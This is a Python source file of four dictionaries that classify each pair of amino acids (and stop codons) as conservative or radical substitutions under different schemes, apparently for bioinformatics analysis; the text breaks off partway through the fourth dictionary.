aaSchemeDict1 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"C",("A","Y"):"C",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"C",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"C",("N","Y"):"C",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"C",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"C",("C","Y"):"C",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"C",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"C",("G","Y"):"C",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"C",("I","Y"):"C",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"C",("L","Y"):"C",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"C",("M","Y"):"C",("M","V"):"C",("F","P"):"C",("F","S"):"C",("F","T"):"C",("F","W"):"C",("F","Y"):"C",("F","V"):"C",("P","S"):"C",("P","T"):"C",("P","W"):"C",("P","Y"):"C",("P","V"):"C",("S","T"):"C",("S","W"):"C",("S","Y"):"C",("S","V"):"C",("T","W"):"C",("T","Y"):"C",("T","V"):"C",("W","Y"):"C",("W","V"):"C",("Y","V"):"C",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"C",("Y","A"):"C",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"C",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"C",("Y","N"):"C",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"C",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"C",("Y","C"):"C",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"C",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"C",("Y","G"):"C",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"C",("Y","I"):"C",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"C",("Y","L"):"C",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"C",("Y","M"):"C",("V","M"):"C",("P","F"):"C",("S","F"):"C",("T","F"):"C",("W","F"):"C",("Y","F"):"C",("V","F"):"C",("S","P"):"C",("T","P"):"C",("W","P"):"C",("Y","P"):"C",("V","P"):"C",("T","S"):"C",("W","S"):"C",("Y","S"):"C",("V","S"):"C",("W","T"):"C",("Y","T"):"C",("V","T"):"C",("Y","W"):"C",("V","W"):"C",("V","Y"):"C",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict2 = {("R","H"):"C",("R","K"):"C",("R","D"):"C",("R","E"):"C",("R","A"):"R",("R","N"):"C",("R","C"):"C",("R","Q"):"C",("R","G"):"C",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"C",("R","T"):"C",("R","W"):"R",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"C",("H","E"):"C",("H","A"):"R",("H","N"):"C",("H","C"):"C",("H","Q"):"C",("H","G"):"C",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"C",("H","T"):"C",("H","W"):"R",("H","Y"):"C",("H","V"):"R",("K","D"):"C",("K","E"):"C",("K","A"):"R",("K","N"):"C",("K","C"):"C",("K","Q"):"C",("K","G"):"C",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"C",("K","T"):"C",("K","W"):"R",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"C",("D","Q"):"C",("D","G"):"C",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"C",("D","T"):"C",("D","W"):"R",("D","Y"):"C",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"C",("E","Q"):"C",("E","G"):"C",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"C",("E","T"):"C",("E","W"):"R",("E","Y"):"C",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"C",("E","R"):"C",("A","R"):"R",("N","R"):"C",("C","R"):"C",("Q","R"):"C",("G","R"):"C",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"C",("T","R"):"C",("W","R"):"R",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"C",("E","H"):"C",("A","H"):"R",("N","H"):"C",("C","H"):"C",("Q","H"):"C",("G","H"):"C",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"C",("T","H"):"C",("W","H"):"R",("Y","H"):"C",("V","H"):"R",("D","K"):"C",("E","K"):"C",("A","K"):"R",("N","K"):"C",("C","K"):"C",("Q","K"):"C",("G","K"):"C",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"C",("T","K"):"C",("W","K"):"R",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"C",("Q","D"):"C",("G","D"):"C",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"C",("T","D"):"C",("W","D"):"R",("Y","D"):"C",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"C",("Q","E"):"C",("G","E"):"C",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"C",("T","E"):"C",("W","E"):"R",("Y","E"):"C",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict3 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"R",("D","Q"):"C",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"R",("E","Q"):"C",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"R",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"R",("N","T"):"R",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"R",("C","T"):"R",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"C",("F","T"):"C",("F","W"):"R",("F","Y"):"R",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"R",("Q","D"):"C",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"R",("Q","E"):"C",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"R",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"R",("T","N"):"R",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"R",("T","C"):"R",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"C",("T","F"):"C",("W","F"):"R",("Y","F"):"R",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict4 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"C",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"C",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"C",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"C",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"C",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"C",("H","Y"):"C",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"C",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"C",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"C",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"C",("N","Q"):"R",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"C",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"C",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"C",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"C",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"C",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"C",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"C",("Y","H"):"C",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"C",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"C",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"C",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"C",("Q","N"):"R",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"C",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("